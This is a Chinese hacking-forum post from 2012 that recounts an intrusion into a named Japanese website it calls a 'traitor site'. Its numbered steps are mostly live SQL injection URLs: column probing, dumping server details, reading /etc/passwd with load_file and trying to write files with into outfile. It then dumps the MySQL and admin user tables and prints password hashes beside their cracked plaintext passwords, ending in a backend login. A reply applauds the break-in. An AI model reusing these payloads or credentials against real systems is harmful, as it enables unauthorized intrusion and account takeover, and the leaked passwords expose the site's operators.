找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3186|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
补:www.zuaa.jp测试

3 `$ Q. n3 y$ V/ l9 ~9 D
7 f* K1 h: s! [+ l0 N0x01. 检测 www.zuaa.jp 收集数据
6 Y4 G: q/ @, V9 v9 \9 T+ b/ ?
" {( L1 J' [. I! l
whatweb9 W& y: [7 i, o/ p2 S& @

; |$ F5 L6 \0 V3 n0 `
0 Q7 g: J4 V6 u; a7 M利用NMAP扫描
7 j+ z( C( |5 b, E) L/ W3 ?6 H  e! G) F9 y/ {- g% k2 X
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持- o0 m" Y% C$ m; c
0x02.找注入点3 I* P% K$ c4 O$ J9 i3 y
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
/ o+ x; R2 K4 ?" O; Q% q5 ~1 J5 i$ }9 {
1 j( t6 H+ ~- F: Y. t6 [, x
0x03.order by
( y1 F: t. ?  H$ u/ Z" n: u0 ]             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1* s+ x0 N; E. u( W% z% V+ G
9 G3 C- R$ \5 X: s3 |
order by 28报错,order by 27正常
+ @  {9 P* W" x. S/ d
# |! A" {( K! T& ^0x04.   union手动查询. h! l/ |" n$ Z' i
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
' H, w8 I( v, w6 k  S添加到 27 时正常显示
* q- {' g3 \0 B! o- I
7 j: e. P7 d# N. f中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
4 u: N6 A" A: o+ W8 }4 }: ^. M  d$ l4 ?
0x05. info:
; [2 `# @1 g  Uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 B9 j% @; T+ l' m) J% i3 p. D
1 G- r: |0 D$ `  Z9 F6 g; k" ]% @1 Auser:            root@localhost
( S# _2 s8 r% Z8 W8 `/ N: |7 ndatabase:    openpne. z" x5 Z" ~' x& Q1 ]8 `
version:      4.1.220 Q5 I9 b$ c. U5 K0 v' f
os:             portbld-freebsd5.4. J6 k0 z: b+ b
) ]2 i+ x: D! M! k, Q
0x06. root用户
; |# t$ v. _( I利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
- r6 U6 i& c/ m' T% J* d' ]8 s* `http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, P: {. Q  g7 A" s' [  |3 |0 c, x' ~! ]1 J, W
通过工具转换0 f/ ?7 I" G% R/ m
% A4 p, K/ [, H7 H0 X
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
3 o! |$ M, ~+ Y" u4 Q: \& t+ P9 j6 _9 p/ V2 {  d; e+ n  X- y
0x07. 利用 into outfile- t/ A" A9 z$ W0 e+ {" v
全部都失败6 [2 m/ \  l) _% U9 ^
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php- P1 w% e& O& c& [
' o# X9 f) ^7 x- P
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 7 Z+ W" Z5 H  h, B! x' w
4 W$ D: a' _$ l) C. m# \
页面显示“MDB2 Error:syntax error”
: L$ N' O9 m3 a. A
6 N, V0 m, T  M8 R2 J0x08. 利用 mysql 4.1% c4 ?0 @# d- D$ @! f
猜常规表名,字段未果 工具 sqlmap- y4 O& S( r% |8 t# \' b
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持9 `6 d+ \  @0 u: `
. D8 E; h7 w5 z9 O; T3 l6 B1 F8 a
3 e8 I9 p, a) n: T1 I; c/ ~
, ?" j9 D5 ?/ Y, n6 K4 u8 E4 I' M) W
0x09. 查找后台/ X2 f4 s# F5 \8 K/ _8 \
利用 现有的各种 后台工具尝试都不行+ f3 Z% V* }: E' `9 a
# s+ W; w. t' y1 t+ n+ E- o6 y: }$ J
0x10.  MySL外联方法
( P7 u  V/ C2 g/ g# B从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行/ Q" M4 K. R! T; B
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
$ q& G* D' I$ H( Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user4 j( O- D- q& T7 L7 ]8 T) L

$ W6 |5 r% z1 C0 \这个可以在 www.cmd5.com 解密
% C- J( F8 ?8 g7 Y. G: I) v2 kroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
2 u3 ^3 d' ?2 X1 S, `chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97% |1 w/ a0 Q0 B. a
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???! s7 A% D0 u7 ^2 f4 k1 C9 c4 c
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???2 H# ~/ r+ B/ l$ K
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
. d2 E5 s4 ~2 w+ f5 x8 @
* j% j3 q# G7 t) |* ^  ~: I+ i" Q0 v5 V) k. v" f* W3 G" l: V; J& Z
0x11. 网站突破
& D3 q, i! g8 S9 P发现网站的源程序 openpne, google 下载 openpne 源码
' g7 g. i5 \6 N4 P# f; z4 {) |/ ^: [) o  H# r
/ z2 ]7 J" ~9 N, ?: k
0x12. 默认信息利用
; d& m7 c: ~- o# D! E! @; Mhttp://sns.zuaa.jp/?m=admin&a=page_login8 v9 P. j7 ]# Q+ R. t9 c) i+ D
( y6 w6 S+ S6 \# e/ W; V
表名 (c_admin_user) ,字段名(username,password)
3 [# M" d" O1 _8 t8 Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
4 U4 K& X9 g, J6 ]  ~5 Y! ~- m$ }* {5 p4 U
解密" o& H9 P) ^' Q* I( M
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009. l( ]5 D6 h6 ]
zuaajp:c0923ec5857796a393da99905008c176,          zju1897% M; H% Y7 X8 c  u2 H

: S) G5 S3 f' F- R* m5 u" [  i中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持( L0 N6 J' r, ]! j6 r

9 {' F: \' z. N9 J0 k5 `, n  `0x13. 登录后台
& }+ T% m# P! n4 f3 m/ q
3 x- J3 m- c( x2 f. B( n. Z- S- b' X6 A( e+ U8 W

% n8 _' E; x0 g7 Z0x14. 小结
% a5 w/ o: O& d2 G6 Z* `7 d6 J/ ~利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
$ {% ^$ ~6 Z/ y6 g" q* V感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
. X" O7 N1 [: N, M; K------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain  x0 B% q1 `7 Z8 G5 y: x8 R4 J' \
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% a, S+ A* b$ `7 u
/ [  S, k% ^9 c最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
: W- x% n$ p8 u9 [( s  E' g) G; G

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表